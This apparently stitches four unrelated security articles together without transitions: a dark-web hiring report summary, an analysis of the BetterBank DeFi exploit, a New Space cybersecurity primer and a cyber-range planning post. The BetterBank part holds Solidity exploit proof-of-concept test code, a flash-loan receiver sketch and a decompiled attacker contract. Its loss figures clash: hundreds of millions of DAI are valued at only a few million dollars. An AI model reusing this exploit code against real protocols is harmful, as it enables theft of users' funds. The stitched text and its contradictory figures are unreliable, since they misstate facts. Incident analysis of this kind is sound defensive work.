In 2022, we published our research examining how IT specialists look for work on the dark web. Since then, the job market has shifted, along with the expectations and requirements placed on professionals. However, recruitment and headhunting on the dark web remain active.
So, what does this job market look like today? This report examines how employment and recruitment function on the dark web, drawing on 2,225 job-related posts collected from shadow forums between January 2023 and June 2025. Our analysis shows that the dark web continues to serve as a parallel labor market with its own norms, recruitment practices and salary expectations, while also reflecting broader global economic shifts. Notably, job seekers increasingly describe prior work experience within the shadow economy, suggesting that for many, this environment is familiar and long-standing.
The majority of job seekers do not specify a professional field, with 69% expressing willingness to take any available work. At the same time, a wide range of roles are represented, particularly in IT. Developers, penetration testers and money launderers remain the most in-demand specialists, with reverse engineers commanding the highest average salaries. We also observe a significant presence of teenagers in the market, many seeking small, fast earnings and often already familiar with fraudulent schemes.
While the shadow market contrasts with legal employment in areas such as contract formality and hiring speed, there are clear parallels between the two. Both markets increasingly prioritize practical skills over formal education, conduct background checks and show synchronized fluctuations in supply and demand.
Looking ahead, we expect the average age and qualifications of dark web job seekers to rise, driven in part by global layoffs. Ultimately, the dark web job market is not isolated — it evolves alongside the legitimate labor market, influenced by the same global economic forces.
From August 26 to 27, 2025, BetterBank, a decentralized finance (DeFi) protocol operating on the PulseChain network, fell victim to a sophisticated exploit involving liquidity manipulation and reward minting. The attack resulted in an initial loss of approximately $5 million in digital assets. Following on-chain negotiations, the attacker returned approximately $2.7 million in assets, mitigating the financial damage and leaving a net loss of around $1.4 million. The vulnerability stemmed from a fundamental flaw in the protocol’s bonus reward system, specifically in the swapExactTokensForFavorAndTrackBonus function. This function was designed to mint ESTEEM reward tokens whenever a swap resulted in FAVOR tokens, but critically, it lacked the necessary validation to ensure that the swap occurred within a legitimate, whitelisted liquidity pool.
A prior security audit by Zokyo had identified and flagged this precise vulnerability. However, due to a documented communication breakdown and the vulnerability’s perceived low severity, the finding was downgraded, and the BetterBank development team did not fully implement the recommended patch. This incident is a pivotal case study demonstrating how design-level oversights, compounded by organizational inaction in response to security warnings, can lead to severe financial consequences in the high-stakes realm of blockchain technology. The exploit underscores the importance of thorough security audits, clear communication of findings, and multilayered security protocols to protect against increasingly sophisticated attack vectors.
In this article, we will analyze the root cause, impact, and on-chain forensics of the helper contracts used in the attack.
Incident overview
Incident timeline
The BetterBank exploit was the culmination of a series of events that began well before the attack itself. In July 2025, approximately one month prior to the incident, the BetterBank protocol underwent a security audit conducted by the firm Zokyo. The audit report, which was made public after the exploit, explicitly identified a critical vulnerability related to the protocol’s bonus system. Titled “A Malicious User Can Trade Bogus Tokens To Qualify For Bonus Favor Through The UniswapWrapper,” the finding was a direct warning about the exploit vector that would later be used. However, based on the documented proof of concept (PoC), which used test Ether, the severity of the vulnerability was downgraded to “Informational” and marked as “Resolved” in the report. The BetterBank team did not fully implement the patched code snippet.
The attack occurred on August 26, 2025. In response, the BetterBank team drained all remaining FAVOR liquidity pools to protect the assets that had not yet been siphoned. The team also took the proactive step of announcing a 20% bounty for the attacker and attempted to negotiate the return of funds.
Remarkably, these efforts were successful. On August 27, 2025, the attacker returned a significant portion of the stolen assets – 550 million DAI tokens. This partial recovery is not a common outcome in DeFi exploits.
Financial impact
This incident had a significant financial impact on the BetterBank protocol and its users. Approximately $5 million worth of assets was initially drained. The attack specifically targeted liquidity pools, allowing the perpetrator to siphon off a mix of stablecoins and native PulseChain assets. The drained assets included 891 million DAI tokens, 9.05 billion PLSX tokens, and 7.40 billion WPLS tokens.
In a positive turn of events, the attacker returned approximately $2.7 million in assets, specifically 550 million DAI. These funds represented a significant portion of the initial losses, resulting in a final net loss of around $1.4 million. This figure speaks to the severity of the initial exploit and the effectiveness of the team’s recovery efforts. While data from various sources show minor fluctuations in reported values due to real-time token price volatility, they consistently point to these key figures.
A detailed breakdown of the losses and recovery is provided in the following table:
Financial Metric | Value | Details
Initial Total Loss | ~$5,000,000 | The total value of assets drained during the exploit.
Assets Drained | 891M DAI, 9.05B PLSX, 7.40B WPLS | The specific tokens and quantities siphoned from the protocol’s liquidity pools.
Assets Returned | ~$2,700,000 (550M DAI) | The value of assets returned by the attacker following on-chain negotiations.
Net Loss | ~$1,400,000 | The final, unrecovered financial loss to the protocol and its users.
Protocol description and vulnerability analysis
The BetterBank protocol is a decentralized lending platform on the PulseChain network. It incorporates a two-token system that incentivizes liquidity provision and engagement. The primary token is FAVOR, while the second, ESTEEM, acts as a bonus reward token. The protocol’s core mechanism for rewarding users was tied to providing liquidity for FAVOR on decentralized exchanges (DEXs). Specifically, a function was designed to mint and distribute ESTEEM tokens whenever a trade resulted in FAVOR as the output token. While seemingly straightforward, this incentive system contained a critical design flaw that an attacker would later exploit.
The vulnerability was not a mere coding bug, but a fundamental architectural misstep. By tying rewards to a generic, unvalidated condition – the appearance of FAVOR in a swap’s output – the protocol created an exploitable surface. Essentially, this design choice trusted all external trading environments equally and failed to anticipate that a malicious actor could replicate a trusted environment for their own purposes. This is a common failure in tokenomics, where the focus on incentivization overlooks the necessary security and validation mechanisms that should accompany the design of such features.
The technical root cause of the vulnerability was a fundamental logic flaw in one of BetterBank’s smart contracts. The vulnerability was centered on the swapExactTokensForFavorAndTrackBonus function. The purpose of this function was to track swaps and mint ESTEEM bonuses. However, its core logic was incomplete: it only verified that FAVOR was the output token from the swap and failed to validate the source of the swap itself. The contract did not check whether the transaction originated from a legitimate, whitelisted liquidity pool or a registered contract. This lack of validation created a loophole that allowed an attacker to trigger the bonus system at will by creating a fake trading environment.
This primary vulnerability was compounded by a secondary flaw in the protocol’s tokenomics: the flawed design of convertible rewards.
The ESTEEM tokens, minted as a bonus, could be converted back into FAVOR tokens. This created a self-sustaining feedback loop. An attacker could trigger the swapExactTokensForFavorAndTrackBonus function to mint ESTEEM, and then use those newly minted tokens to obtain more FAVOR. The FAVOR could then be used in subsequent swaps to mint even more ESTEEM rewards. This cyclical process enabled the attacker to generate an unlimited supply of tokens and drain the protocol’s real reserves. The synergistic combination of logic and design flaws created a high-impact attack vector that was difficult to contain once initiated.
To sum it up, the BetterBank exploit was the result of a critical vulnerability in the bonus minting system that allowed attackers to create fake liquidity pairs and harvest an unlimited amount of ESTEEM token rewards. As mentioned above, the system couldn’t distinguish between legitimate and malicious liquidity pairs, creating an opportunity for attackers to generate illegitimate token pairs. The BetterBank system included protection measures against attacks capable of inflicting substantial financial damage – namely a sell tax. However, the threat actors were able to bypass this tax mechanism, which exacerbated the impact of the attack.
Exploit breakdown
The exploit targeted the bonus minting system of the favorPLS.sol contract, specifically the logBuy() function and related tax logic. The key vulnerable components are:
The tax only applies to transfers to legitimate, whitelisted addresses that are marked as isMarketPair[recipient]. By definition, fake, unauthorized LPs are not included in this mapping, so they bypass the maximum 50% sell tax imposed by protocol owners.
function _transfer(address sender, address recipient, uint256 amount) internal override {
    uint256 taxAmount = 0;
    if (_isTaxExempt(sender, recipient)) {
        super._transfer(sender, recipient, amount);
        return;
    }
    // Transfer to Market Pair is likely a sell to be taxed
    if (isMarketPair[recipient]) {
        taxAmount = (amount * sellTax) / MULTIPLIER;
    }
    if (taxAmount > 0) {
        super._transfer(sender, treasury, taxAmount);
        amount -= taxAmount;
    }
    super._transfer(sender, recipient, amount);
}
The uniswapWraper.sol contract contains the buy wrapper functions that call logBuy(). The system only checks whether the pair is present in the allowedDirectPair mapping, a check an attacker can satisfy by creating fake tokens and registering pairs that contain them.
function swapExactTokensForFavorAndTrackBonus(
    uint amountIn,
    uint amountOutMin,
    address[] calldata path,
    address to,
    uint256 deadline
) external {
    address finalToken = path[path.length - 1];
    require(isFavorToken[finalToken], "Path must end in registered FAVOR");
    require(allowedDirectPair[path[0]][finalToken], "Pair not allowed");
    require(path.length == 2, "Path must be direct");
    // ... swap logic ...
    uint256 twap = minterOracle.getTokenTWAP(finalToken);
    if (twap < 3e18) {
        IFavorToken(finalToken).logBuy(to, favorReceived);
    }
}
Step-by-step attack reconstruction
The attack on BetterBank was not a single transaction, but rather a carefully orchestrated sequence of on-chain actions. The exploit began with the attacker acquiring the necessary capital through a flash loan. Flash loans are a feature of many DeFi protocols that allow a user to borrow large sums of assets without collateral, provided the loan is repaid within the same atomic transaction. The attacker used the loan to obtain a significant amount of assets, which were then used to manipulate the protocol’s liquidity pools.
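The sketch below is a generic, simplified illustration of how an Aave-V2-style flash loan receiver is structured, matching the executeOperation callback signature discussed later in this article. It is not the attacker’s code; the contract, interface and function names are assumptions made for illustration, and the actual attack logic is elided.

// Generic illustration of an Aave-V2-style flash loan receiver. This is NOT the
// attacker's contract: the names and pool interface here are assumptions.
pragma solidity ^0.8.0;

interface ILendingPool {
    function flashLoan(
        address receiverAddress,
        address[] calldata assets,
        uint256[] calldata amounts,
        uint256[] calldata modes,
        address onBehalfOf,
        bytes calldata params,
        uint16 referralCode
    ) external;
}

interface IERC20Minimal {
    function approve(address spender, uint256 amount) external returns (bool);
}

contract FlashLoanReceiverSketch {
    ILendingPool public immutable pool;

    constructor(address pool_) {
        pool = ILendingPool(pool_);
    }

    // Entry point: borrow `amount` of `asset` with no collateral.
    function requestLoan(address asset, uint256 amount) external {
        address[] memory assets = new address[](1);
        assets[0] = asset;
        uint256[] memory amounts = new uint256[](1);
        amounts[0] = amount;
        uint256[] memory modes = new uint256[](1); // 0 = repay in full within this transaction
        pool.flashLoan(address(this), assets, amounts, modes, address(this), bytes(""), 0);
    }

    // Callback executed by the pool while this contract holds the borrowed funds.
    // Whatever happens here (swaps, pool manipulation, etc.) must leave enough
    // balance to repay principal plus premium, or the entire transaction reverts.
    function executeOperation(
        address[] calldata assets,
        uint256[] calldata amounts,
        uint256[] calldata premiums,
        address /* initiator */,
        bytes calldata /* params */
    ) external returns (bool) {
        // ... the borrower's logic runs here ...
        for (uint256 i = 0; i < assets.length; i++) {
            IERC20Minimal(assets[i]).approve(address(pool), amounts[i] + premiums[i]);
        }
        return true; // the pool pulls back principal + premium after this returns
    }
}

Because repayment is enforced atomically, an attacker needs no capital of their own: the loan simply has to be profitable enough within a single transaction to cover the premium.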
The attacker used the flash loan funds to target and drain the real DAI-PDAIF liquidity pool, a core part of the BetterBank protocol. This initial step was crucial because it weakened the protocol’s defenses and provided the attacker with a large volume of PDAIF tokens, which were central to the reward-minting scheme.
Capital acquisition
After draining the real liquidity pool, the attacker moved to the next phase of the operation. They deployed a new, custom, and worthless ERC-20 token. Exploiting the permissionless nature of PulseX, the attacker then created a fake liquidity pool, pairing their newly created bogus token with PDAIF.
This fake pool was key to the entire exploit. It enabled the attacker to control both sides of a trading pair and manipulate the price and liquidity to their advantage without affecting the broader market.
One critical element that made this attack profitable was the protocol’s tax logic. BetterBank had implemented a system that levied high fees on bulk swaps to deter this type of high-volume trading. However, the tax only applied to “official” or whitelisted liquidity pairs. Since the attacker’s newly created pool was not on this list, they were able to conduct their trades without incurring any fees. This critical loophole ensured the attack’s profitability.
Fake LP pair creation
After establishing the bogus token and fake liquidity pool, the attacker initiated the final and most devastating phase of the exploit: the reward minting loop. They executed a series of rapid swaps between their worthless token and PDAIF within their custom-created pool. Each swap triggered the vulnerable swapExactTokensForFavorAndTrackBonus function in the BetterBank contract. Because the function did not validate the pool, it minted a substantial bonus of ESTEEM tokens with each swap, despite the illegitimacy of the trading pair.
Each swap triggers:
swapExactTokensForFavorAndTrackBonus()
logBuy() function call
calculateFavorBonuses() execution
ESTEEM token minting (44% bonus)
fake LP sell tax bypass
Reward minting loop
The newly minted ESTEEM tokens were then converted back into FAVOR tokens, which could be used to facilitate more swaps. This created a recursive loop that allowed the attacker to generate an immense artificial supply of rewards and drain the protocol’s real asset reserves. Using this method, the attacker extracted approximately 891 million DAI, 9.05 billion PLSX, and 7.40 billion WPLS, effectively destabilizing the entire protocol. The success of this multi-layered attack demonstrates how a single fundamental logic flaw, combined with a series of smaller design failures, can lead to a catastrophic outcome.
Economic impact comparison
Mitigation strategy
This attack could have been averted if a number of security measures had been implemented.
First, the liquidity pool should be verified during a swap. The LP pair and liquidity source must be valid.
function _transfer(address sender, address recipient, uint256 amount) internal override {
    uint256 taxAmount = 0;
    if (_isTaxExempt(sender, recipient)) {
        super._transfer(sender, recipient, amount);
        return;
    }
    // FIX: Apply tax to ALL transfers, not just market pairs
    if (isMarketPair[recipient] || isUnverifiedPair(recipient)) {
        taxAmount = (amount * sellTax) / MULTIPLIER;
    }
    if (taxAmount > 0) {
        super._transfer(sender, treasury, taxAmount);
        amount -= taxAmount;
    }
    super._transfer(sender, recipient, amount);
}
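In addition to the tax fix above, the buy wrapper itself could refuse to mint bonuses unless the pool involved in the swap was created by the official factory and explicitly whitelisted. The snippet below is a hedged sketch of that idea in the same abbreviated style as the snippets above; names such as officialFactory, IPulseXFactory and isWhitelistedPool are assumptions rather than parts of the actual BetterBank codebase.

// Hypothetical hardening of the buy wrapper: resolve the pair through the
// official factory and require an explicit whitelist entry before rewarding.
// officialFactory, IPulseXFactory and isWhitelistedPool are assumed names.
function swapExactTokensForFavorAndTrackBonus(
    uint amountIn,
    uint amountOutMin,
    address[] calldata path,
    address to,
    uint256 deadline
) external {
    require(path.length == 2, "Path must be direct");
    address finalToken = path[path.length - 1];
    require(isFavorToken[finalToken], "Path must end in registered FAVOR");
    // FIX: derive the pair from the trusted factory instead of trusting caller-supplied pairs
    address pair = IPulseXFactory(officialFactory).getPair(path[0], finalToken);
    require(pair != address(0), "Pair not created by official factory");
    require(isWhitelistedPool[pair], "Pool not whitelisted for bonuses");
    // ... swap logic and TWAP-gated logBuy() as before ...
}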
To prevent large-scale one-time attacks, a daily limit should be introduced to stop users from conducting transactions totaling more than 10,000 ESTEEM tokens per day.
mapping(address => uint256) public lastBonusClaim;
mapping(address => uint256) public dailyBonusLimit;
uint256 public constant MAX_DAILY_BONUS = 10000 * 1e18; // 10K ESTEEM per day

function logBuy(address user, uint256 amount) external {
    require(isBuyWrapper[msg.sender], "Only approved buy wrapper can log buys");
    // ADD: Rate limiting
    require(block.timestamp - lastBonusClaim[user] > 1 hours, "Rate limited");
    require(dailyBonusLimit[user] < MAX_DAILY_BONUS, "Daily limit exceeded");
    // Update rate limiting
    lastBonusClaim[user] = block.timestamp;
    dailyBonusLimit[user] += calculatedBonus;
    // ... rest of function
}
On-chain forensics and fund tracing
The on-chain trail left by the attacker provides a clear forensic record of the exploit. After draining the assets on PulseChain, the attacker swapped the stolen DAI, PLSX, and WPLS for more liquid, cross-chain assets. The perpetrator then bridged approximately $922,000 worth of ETH from the PulseChain network to the Ethereum mainnet. This was done using a secondary attacker address beginning with 0xf3BA…, likely created to obscure the link to the primary exploitation address. The final step in the money laundering process was the use of a crypto mixer, such as Tornado Cash, to obscure the origin of the funds and make them far harder to trace.
Tracing the flow of these funds was challenging because many public-facing block explorers for the PulseChain network were either inaccessible or lacked comprehensive data at the time of the incident. This highlights the practical difficulties associated with on-chain forensics, where the lack of a reliable, up-to-date block explorer can greatly hinder analysis. In these scenarios, it becomes critical to use open-source explorers like Blockscout, which are more resilient and transparent.
The following table provides a clear reference for the key on-chain entities involved in the attack:
On-Chain Entity | Address | Description
Primary Attacker EOA | 0x48c9f537f3f1a2c95c46891332E05dA0D268869B | The main externally owned account used to initiate the attack.
Secondary Attacker EOA | 0xf3BA0D57129Efd8111E14e78c674c7c10254acAE | The address used to bridge assets to the Ethereum network.
Attacker Helper Contracts | 0x792CDc4adcF6b33880865a200319ecbc496e98f8, etc. | A list of contracts deployed by the attacker to facilitate the exploit.
PulseXRouter02 | 0x165C3410fC91EF562C50559f7d2289fEbed552d9 | The PulseX decentralized exchange router contract used in the exploit.
We managed to get hold of the attacker’s helper contracts to deepen our investigation. Through comprehensive bytecode analysis and contract decompilation, we determined that the attack architecture was multilayered. The attack utilized a factory contract pattern (0x792CDc4adcF6b33880865a200319ecbc496e98f8) that contained 18,219 bytes of embedded bytecode that were dynamically deployed during execution. The embedded contract revealed three critical functions: two simple functions (0x51cff8d9 and 0x529d699e) for initialization and cleanup, and a highly complex flash loan callback function (0x920f5c84) with the signature executeOperation(address[],uint256[],uint256[],address,bytes), which matches standard DeFi flash loan protocols like Aave and dYdX. Analysis of the decompiled code revealed that the executeOperation function implements sophisticated parameter parsing for flash loan callbacks, dynamic contract deployment capabilities, and complex external contract interactions with the PulseX Router (0x165c3410fc91ef562c50559f7d2289febed552d9).
contract BetterBankExploitContract {
    function main() external {
        // Initialize memory
        assembly {
            mstore(0x40, 0x80)
        }
        // Revert if ETH is sent
        if (msg.value > 0) {
            revert();
        }
        // Check minimum calldata length
        if (msg.data.length < 4) {
            revert();
        }
        // Extract function selector
        uint256 selector = uint256(msg.data[0:4]) >> 224;
        // Dispatch to appropriate function
        if (selector == 0x51cff8d9) {
            // Function: withdraw(address)
            withdraw();
        } else if (selector == 0x529d699e) {
            // Function: likely exploit execution
            executeExploit();
        } else if (selector == 0x920f5c84) {
            // Function: executeOperation(address[],uint256[],uint256[],address,bytes)
            // This is a flash loan callback function!
            executeOperation();
        } else {
            revert();
        }
    }

    // Function 0x51cff8d9 - Withdraw function
    function withdraw() internal {
        // Implementation would be in the bytecode
        // Likely withdraws profits to attacker address
    }

    // Function 0x529d699e - Main exploit function
    function executeExploit() internal {
        // Implementation would be in the bytecode
        // Contains the actual BetterBank exploit logic
    }

    // Function 0x920f5c84 - Flash loan callback
    function executeOperation(
        address[] calldata assets,
        uint256[] calldata amounts,
        uint256[] calldata premiums,
        address initiator,
        bytes calldata params
    ) internal {
        // This is the flash loan callback function
        // Contains the exploit logic that runs during flash loan
    }
}
The attack exploited three critical vulnerabilities in BetterBank’s protocol: unvalidated reward minting in the logBuy function that failed to verify legitimate trading pairs; a tax bypass mechanism in the _transfer function that only applied the 50% sell tax to addresses marked as market pairs; and oracle manipulation through fake trading volume. The attacker requested flash loans of 50M DAI and 7.14B PLP tokens, drained real DAI-PDAIF pools, and created fake PDAIF pools with minimal liquidity. They performed approximately 20 iterations of fake trading to trigger massive ESTEEM reward minting, converting the rewards into additional PDAIF tokens, before re-adding liquidity with intentional imbalances and extracting profits of approximately 891M DAI through arbitrage.
PoC snippets
To illustrate the vulnerabilities that made such an attack possible, we examined code snippets from Zokyo researchers.
First, the attacker generates a worthless fake token and creates a liquidity pool pairing it with FAVOR. Because the token itself has no legitimate value, any liquidity pair containing it is equally illegitimate.
function _createFakeLPPair() internal {
    console.log("--- Step 1: Creating Fake LP Pair ---");
    vm.startPrank(attacker);
    // Create the pair
    fakePair = factory.createPair(address(favorToken), address(fakeToken));
    console.log("Fake pair created at:", fakePair);
    // Add initial liquidity to make it "legitimate"
    uint256 favorAmount = 1000 * 1e18;
    uint256 fakeAmount = 1000000 * 1e18;
    // Transfer FAVOR to attacker
    vm.stopPrank();
    vm.prank(admin);
    favorToken.transfer(attacker, favorAmount);
    vm.startPrank(attacker);
    // Approve router
    favorToken.approve(address(router), favorAmount);
    fakeToken.approve(address(router), fakeAmount);
    // Add liquidity
    router.addLiquidity(
        address(favorToken),
        address(fakeToken),
        favorAmount,
        fakeAmount,
        0,
        0,
        attacker,
        block.timestamp + 300
    );
    console.log("Liquidity added to fake pair");
    console.log("FAVOR in pair:", favorToken.balanceOf(fakePair));
    console.log("FAKE in pair:", fakeToken.balanceOf(fakePair));
    vm.stopPrank();
}
Next, the fake LP pair is approved in the allowedDirectPair mapping, allowing it to pass the system check and perform the bulk swap transactions.
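The published snippets jump from pair creation to exploit execution, so the registration step itself is not shown. As a rough, hypothetical reconstruction in Foundry test syntax (the setter name setAllowedDirectPair and the use of an admin prank are assumptions, not quoted from the PoC), it might look like this:

// Hypothetical Step 2: register the fake pair so the wrapper's only check passes.
// The setter name and the admin prank are assumptions, not taken from the PoC.
function _approveFakePair() internal {
    console.log("--- Step 2: Approving Fake Pair ---");
    vm.prank(admin);
    wrapper.setAllowedDirectPair(address(fakeToken), address(favorToken), true);
    assertTrue(wrapper.allowedDirectPair(address(fakeToken), address(favorToken)), "Fake pair should now be allowed");
}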
These steps enable exploit execution, completing FAVOR swaps and collecting ESTEEM bonuses.
function _executeExploit() internal {
    console.log("--- Step 3: Executing Exploit ---");
    vm.startPrank(attacker);
    uint256 exploitAmount = 100 * 1e18; // 100 FAVOR per swap
    uint256 iterations = 10; // 10 swaps
    console.log("Performing %d exploit swaps of %d FAVOR each", iterations, exploitAmount / 1e18);
    for (uint i = 0; i < iterations; i++) {
        _performExploitSwap(exploitAmount);
        console.log("Swap %d completed", i + 1);
    }
    // Claim accumulated bonuses
    console.log("Claiming accumulated ESTEEM bonuses...");
    favorToken.claimBonus();
    vm.stopPrank();
}
We also performed a single swap in a local environment to demonstrate the design flaw that allowed the attackers to perform transactions over and over again.
function _performExploitSwap(uint256 amount) internal {
    // Create swap path: FAVOR -> FAKE
    address[] memory path = new address[](2);
    path[0] = address(favorToken);
    path[1] = address(fakeToken);
    // Approve router
    favorToken.approve(address(router), amount);
    // Perform swap - this triggers logBuy() and mints ESTEEM
    router.swapExactTokensForTokensSupportingFeeOnTransferTokens(
        amount,
        0, // Accept any amount out
        path,
        attacker,
        block.timestamp + 300
    );
}
Finally, several checks are performed to verify the exploit’s success.
function _verifyExploitSuccess() internal {
    uint256 finalFavorBalance = favorToken.balanceOf(attacker);
    uint256 finalEsteemBalance = esteemToken.balanceOf(attacker);
    uint256 esteemMinted = esteemToken.totalSupply() - initialEsteemBalance;
    console.log("Attacker's final FAVOR balance:", finalFavorBalance / 1e18);
    console.log("Attacker's final ESTEEM balance:", finalEsteemBalance / 1e18);
    console.log("Total ESTEEM minted during exploit:", esteemMinted / 1e18);
    // Verify the attack was successful
    assertGt(finalEsteemBalance, 0, "Attacker should have ESTEEM tokens");
    assertGt(esteemMinted, 0, "ESTEEM tokens should have been minted");
    console.log("EXPLOIT SUCCESSFUL!");
    console.log("Attacker gained ESTEEM tokens without legitimate trading activity");
}
Conclusion
The BetterBank exploit was a multifaceted attack that combined technical precision with detailed knowledge of the protocol’s design flaws. The root cause was a lack of validation in the reward-minting logic, which enabled an attacker to generate unlimited value from a counterfeit liquidity pool. This technical failure was compounded by an organizational breakdown whereby a critical vulnerability explicitly identified in a security audit was downgraded in severity and left unpatched.
The incident serves as a powerful case study for developers, auditors, and investors. It demonstrates that ensuring the security of a decentralized protocol is a shared, ongoing responsibility. The vulnerability was not merely a coding error, but rather a design flaw that created an exploitable surface. The confusion and crisis communications that followed the exploit are a stark reminder of the consequences when communication breaks down between security professionals and protocol teams. While the return of a portion of the funds is a positive outcome, it does not overshadow the core lesson: in the world of decentralized finance, every line of code matters, every audit finding must be taken seriously, and every protocol must adopt a proactive, multilayered defense posture to safeguard against the persistent and evolving threats of the digital frontier.
Having worked as a cybersecurity engineer for many years and closely followed the rapid evolution of the space ecosystem, I wholeheartedly believe that space systems today are targeted by cyberattacks more than ever.
The purpose of this article is to give you a glimpse of cybersecurity threats and challenges facing the New Space economy and ecosystem, with a focus on smallsats in Low Earth Orbit (LEO), as well as some technologies to assess space cybersecurity risks.
The article series is divided into four parts: Introduction to New Space, Threats in the New Space, Secure the New Space, and finally New Space Future Development and Challenges.
Introduction
The Aerospace and Defense industry is a global industry composed of many companies that design, manufacture, and service commercial and military aircraft, ships, spacecraft, weapons systems, and related equipment.
The Aerospace and Defense industry is composed of different key segments: large defense prime contractors/system integrators, commercial aerospace prime contractors or system integrators, first-tier subcontractors, second-tier subcontractors, and finally third-tier and fourth-tier subcontractors.
The industry is facing enormous challenges that stem from the COVID-19 pandemic, concerns over sustainability, disruptions from new technologies, heightened regulatory forces, radically transforming ecosystems, and, above all, the cyber threats and attacks that are getting more and more worrisome.
The increase in space cyberattacks and cybersecurity risks stems from the evolution of the space ecosystem into the New Space Age.
In this first article of the series, we will focus on the New Space notion and the definition of space system architecture.
From Old Space to New Space
Historically, the space industry was the domain of nation-states, and not just any nations: the United States and the Soviet Union dominated the field. Space belonged to governments and defense departments, and its objectives were essentially political and strategic.
Now, there is more involvement in space globally than ever before in history. This new era, led by private space efforts, is known as the “New Space Age”: a movement that views space not as a location or metaphor, but as a wellspring of resources, opportunities, and mysteries yet to be unlocked.
New Space is evolving rapidly with industry privatization and the birth of new ventures to achieve greater space accessibility for different parties.
Nevertheless, these technological developments and the rapid growth of New Space projects enlarge the space attack surface and increase the risk of cyberattacks.
Space and Satellite Systems
LEO and CubeSats
LEO is an orbit around the Earth with an altitude of 2,000 km (about 1,200 miles) or less.
Most LEO Space Vehicles (SVs) are small satellites, also known as CubeSats or Smallsats.
A CubeSat is a small, low-cost satellite that can be developed and launched by colleges, high schools, and even individuals. A 1U (one unit) CubeSat measures 10 cm x 10 cm x 10 cm and weighs about 1 kg. CubeSats can fly as a single unit (1U) or in larger configurations (up to 24U).
CubeSats represent paradigm shifts in developing space missions in the New Space Age.
Nowadays, CubeSats, like all other SV types, face environmental, operational, and cybersecurity challenges.
Space System Design
Any space system is composed of three main segments: ground segment, space segment, and link segment. In addition, we have the user segment.
Ground segment: The ground segment includes all the terrestrial elements of the space systems and allows the command, control, and management of the satellite itself and the data coming from the payload and transmitted to the users.
Space segment: The space segment includes the satellites, tracking, telemetry, command, control, monitoring, and related facilities and equipment used to support the satellite’s operations.
Link/communication segment: The link or communication segment is the data and signals exchanged between the ground and space segments.
User segment: The user segment includes the user terminals and stations that interact with the satellite by transmitting and receiving signals.
Conclusion
The New Space age makes the space field more accessible to everyone on this planet. It’s about democratizing access to space.
This new age is characterized by the growth of Smallsat development, especially CubeSats in LEO. These satellites form part of the space architecture alongside the ground, communication, and user segments. Nevertheless, is this space system design threatened by cyberattacks?
In the next article in the series, we will explore the answer to this question.
In the last few years, IBM X-Force has seen an unprecedented increase in requests to build cyber ranges. By cyber ranges, we mean facilities or online spaces that enable team training and exercises of cyberattack responses. Companies understand the need to drill their plans based on real-world conditions and using real tools, attacks and procedures.
What’s driving this increased demand? The increase in remote and hybrid work models emerging from the COVID-19 pandemic has elevated the priority to collaborate and train together as a team with the goal of being prepared for potential incidents.
Another force driving demand for cyber ranges is the rapid growth of high-profile attacks with seven-figure loss events and the public disclosure of attacks, impacting reputation and financial results. Damaging attacks, like data breaches and ransomware, have cemented the criticality of effective incident response to prevent worst-case outcomes and rapidly contain eventual ones.
Once you decide that your cybersecurity team and other actors in your cyberattack response protocols need to practice together, the economics of a dedicated cyber range are compelling. An organization can train many more employees more quickly through a dedicated cyber range.
But before you pull the trigger and order a cyber range, you should make a full evaluation of the pros and cons. The primary con, of course, is that a dedicated cyber range might be oversized for the organization’s long-term needs. You might not use it enough to justify the costs of building and operating an actual range. Alternatively, you might prefer to run cyberattack exercises remotely to more closely simulate the real work environment of your teams.
This post will provide a primer on conducting a graduated cyber range evaluation and help set up processes to think through what type of drilling grounds might be best suited for your team.
Why Build a Cyber Range? Mandatory Training, Certifications and Compliance
The most compelling reason for building a cyber range is that it is one of the best ways to improve the coordination and experience level of your team. Experience and practice enhance teamwork and provide the necessary background for smart decision-making during a real cyberattack. Cyber ranges are one of the best ways to run real attack scenarios and immerse the team in a live response exercise.
An additional reason to have access to a cyber range is that many compliance certifications and insurance policies cite mandatory cyber training of various degrees. These are driven by mandates and compliance standards established by the National Institute of Standards and Technology and the International Organization for Standardization (ISO). With these requirements in place, organizations are compelled to free up budgets for relevant cyber training.
There are different ways to fulfill these training requirements. Depending on their role in the company, employees can be required to obtain certifications from organizations such as the SANS Institute. Training mandates can also be fulfilled through micro-certifications and online coursework on remote learning and certification platforms such as Coursera. Giving a company access to a cyber range does not always mean building one in-house.
A Cyber Training Progression in Stages: From Self-Study to Fully Operational Cyber Ranges
In talking with our customers, we offer them multiple options for cyber range setups, and we advise them to carry out the implementation in stages. Each stage is appropriate for a different level of commitment, activity and desire for a fully immersive cyber range experience.
Stage 1: Self-Training, Certifications and Labs
Stage 1 is blocking and tackling, the bare minimum for competent cybersecurity training. This provides the basics required for continuing education and fulfilling cyber training requirements. Stage 1 can include:
SANS training course in desired areas of expertise
Completion of Coursera online self-paced or Massive Open Online Course classes with requisite certification of completion
Classes with a specific focus, such as reverse engineering malware or network forensics that explains how attackers traverse networks without being detected
An added part to Stage 1 is holding hands-on labs where participants complete tasks or simulate blue team or red team activities. The labs should focus on outcomes and metrics as much as they focus on completion. Participants should understand whether they are able to efficiently and effectively find indicators of compromise and mitigate attacks, as well as map the primary tactics, techniques and procedures (TTPs) associated with those attack simulations.
Stage 2: Team and Wider-Scale Corporate Exercises
In Stage 2, the more mature companies can escalate to coordinated group exercises that are planned and follow a curriculum. This requires dedicated compute infrastructure or hardware (some organizations choose to do it all from their existing workstations). In these exercises, all stakeholders take the lessons they have learned and bring them together to orchestrate a coordinated response. You may choose to have red teams attempt to infiltrate and go up against blue teams and involve threat intelligence teams and other security staff in the company’s security operations center.
If you want to make this stage a more immersive and realistic experience, you may also choose to include other teams, such as marketing. Bringing in operational technology (OT) teams at this stage is strongly suggested. Many of the most recent ransomware attacks have targeted not just laptops and other IT devices but also OT devices.
Business leaders tend to benefit strongly from witnessing and experiencing immersive coordinated exercises. Giving them insights into what other teams are experiencing and how they need to respond provides invaluable context that comes into play during an actual crisis. The most advanced team cyber response exercises can involve dozens or hundreds of team members and last several days.
Stage 3: The Collaborative Cyber Range With Vendors, Customers and Partners
Coordinating responses for your organization is a great start. But what about those around you — your customers, vendors and partners? The nature of your digital infrastructure, the ubiquitous connection to application programming interfaces, the proliferation of connected devices and the varying types of connections make it critical to coordinate an attack response with your closest third parties.
It’s easy to understand the criticality of an orchestrated response. The world has become more and more connected; the digital links among vendors, customers and partners have grown. An organization can have hundreds of third-party connections at a time. This has increased the attack surface and made supply chain attacks a preferred tactic with cyber criminals and nation-state actors alike. Supply chain attacks can be hard to detect because they come through a trusted intermediary. They are also a general-purpose exploit for securing future access, traversing networks and expanding horizontally inside an organization.
